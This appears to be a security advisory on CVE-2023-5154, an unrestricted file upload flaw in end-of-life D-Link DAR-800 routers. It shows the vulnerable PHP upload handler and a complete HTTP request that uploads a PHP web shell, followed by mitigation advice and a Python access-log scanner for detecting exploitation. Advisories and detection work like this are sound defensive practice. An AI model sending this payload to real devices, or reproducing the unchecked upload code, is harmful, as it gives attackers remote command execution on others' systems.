A critical vulnerability, CVE-2023-5154, has been discovered in D-Link DAR-800 devices running firmware versions up to 20151231. The flaw enables unrestricted file upload and therefore poses a considerable security risk. It affects only products that the manufacturer no longer supports: D-Link was promptly informed and confirmed that the affected product is end-of-life and should be retired and replaced. The exploit has been publicly disclosed and may be used by threat actors. The vulnerability is also tracked as VDB-240250.

Exploit Details

The vulnerability lies within the /sysmanage/changelogo.php file, where the parameter file_upload is improperly validated. This allows attackers to upload and execute arbitrary PHP code remotely, granting them control over the affected device.

Here's a code snippet illustrating the file upload handling:

<?php
  // ...
  // Upload destination is a fixed, web-accessible directory.
  $target_dir = "/uploads/";
  // The file name comes straight from the client; basename() only strips path components.
  $target_file = $target_dir . basename($_FILES["file_upload"]["name"]);
  // ...
  // No extension, MIME type or content check is performed before the file is written,
  // so an uploaded .php file ends up executable under the web root.
  if (move_uploaded_file($_FILES["file_upload"]["tmp_name"], $target_file)) {
    // ...
  }
  // ...
?>

The exploit can be executed remotely by sending a specially crafted HTTP request, like this:

POST /sysmanage/changelogo.php HTTP/1.1
Host: vulnerable-device
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZugW
Content-Length: ...

------WebKitFormBoundary7MA4YWxkTrZugW
Content-Disposition: form-data; name="file_upload"; filename="malicious.php"
Content-Type: application/octet-stream

<?php
  system($_GET['cmd']);
?>
------WebKitFormBoundary7MA4YWxkTrZugW--

Original References

- Vulnerability Database (VDB)
- Official CVE Details

Recommendations

Given that the manufacturer has confirmed the product is end-of-life and no longer provides support, it is highly recommended to retire and replace the affected D-Link DAR-800 devices. In the meantime, you can mitigate the risk by restricting access to the /sysmanage/changelogo.php file or disabling the web management interface entirely.
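Until the devices are replaced, the two halves of this attack (a POST to the upload handler, then a request for a .php file out of /uploads/) are visible in web-server access logs. The following Python is an added example, not code from the advisory or from D-Link; it assumes the logs are in Apache/nginx combined format, and the log lines, IPs and filename below are constructed.

```python
import re
from typing import Dict, List, Optional

# Apache/nginx "combined" access-log line: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)
UPLOAD_ENDPOINT = "/sysmanage/changelogo.php"   # vulnerable handler named in the advisory
UPLOAD_DIR = "/uploads/"                        # $target_dir in the vulnerable snippet

# Constructed sample log (addresses, times and filename are made up for the example).
SAMPLE_LOG = """\
198.51.100.7 - - [25/Sep/2023:03:20:01 +0000] "GET /sysmanage/changelogo.php HTTP/1.1" 200 812
198.51.100.7 - - [25/Sep/2023:03:20:05 +0000] "POST /sysmanage/changelogo.php HTTP/1.1" 200 312
198.51.100.7 - - [25/Sep/2023:03:20:09 +0000] "GET /uploads/malicious.php?cmd=id HTTP/1.1" 200 44
203.0.113.9 - - [25/Sep/2023:03:21:30 +0000] "GET /uploads/logo.png HTTP/1.1" 200 5120
203.0.113.9 - - [25/Sep/2023:03:21:31 +0000] "POST /sysmanage/changelogo.php HTTP/1.1" 200 312
"""

def classify(line: str) -> Optional[Dict[str, str]]:
    """Label one log line, or return None if it is not of interest."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path_only = m["path"].partition("?")[0]     # drop the query string before matching
    if m["method"] == "POST" and path_only == UPLOAD_ENDPOINT:
        kind = "upload_attempt"                 # any write through the unchecked handler
    elif (m["method"] == "GET" and path_only.startswith(UPLOAD_DIR)
          and path_only.lower().endswith(".php")):
        kind = "uploaded_php_executed"          # a script being served from the upload directory
    else:
        return None
    return {"ip": m["ip"], "ts": m["ts"], "kind": kind, "path": m["path"]}

def scan(log_text: str) -> List[Dict[str, str]]:
    """Per-line findings, plus a 'likely_exploit' finding for each client that first
    POSTs to the upload endpoint and is later served a .php file from /uploads/."""
    per_line = [f for f in map(classify, log_text.splitlines()) if f]
    uploaded, correlated = set(), []
    for f in per_line:                          # log order is time order
        if f["kind"] == "upload_attempt":
            uploaded.add(f["ip"])
        elif f["kind"] == "uploaded_php_executed" and f["ip"] in uploaded:
            correlated.append({**f, "kind": "likely_exploit"})
    return per_line + correlated

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A lone upload_attempt is worth reviewing on its own, since the legitimate logo-change page should see very few POSTs and only from administrators.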

Please take this vulnerability seriously and act accordingly to protect your network and devices from potential attacks.

Timeline

Published on: 09/25/2023 03:15:09 UTC
Last modified on: 11/07/2023 04:23:33 UTC